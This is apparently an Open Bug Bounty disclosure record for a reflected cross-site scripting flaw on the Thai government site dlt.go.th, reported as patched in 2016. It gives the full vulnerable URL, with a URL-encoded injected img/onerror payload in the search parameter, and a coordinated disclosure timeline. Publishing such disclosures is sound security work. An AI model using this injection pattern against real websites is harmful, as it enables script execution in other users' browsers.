dlt.go.th XSS vulnerability

2016-06-18T11:10:00
ID OBB:159763
Type openbugbounty
Reporter RahulKankrale
Modified 2016-09-11T02:30:00

Description

Vulnerable URL:
http://www.dlt.go.th/th/index.php?option=com_googlesearch_cse&n;=30&Itemid;=&cx;=018291437531448668840%3Ao5doxshrwva&cof;=FORID%3A9&ie;=UTF-8&q;=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%28%2Fopenbugbounty%2F%29%3E&sa;=%E0%B8%84%E0%B9%89%E0%B8%99%E0%B8%AB%E0%B8%B2&hl;=th&cr;=countryTH&siteurl;=https%3A%2F%2Fwww.google.com
Details:

Description| Value
---|---
Patched:| Yes, at
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| 107040
VIP website status:| No
Check dlt.go.th SSL connection:| (Grade: F)

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability submitted via Open Bug Bounty| 18 June, 2016 11:10 GMT
Generic security notifications sent to website owner| 18 June, 2016 11:13 GMT
Vulnerability details disclosed by researcher| 10 September, 2016 12:12 GMT
Vulnerability patched by the website owner| 11 September, 2016 02:30 GMT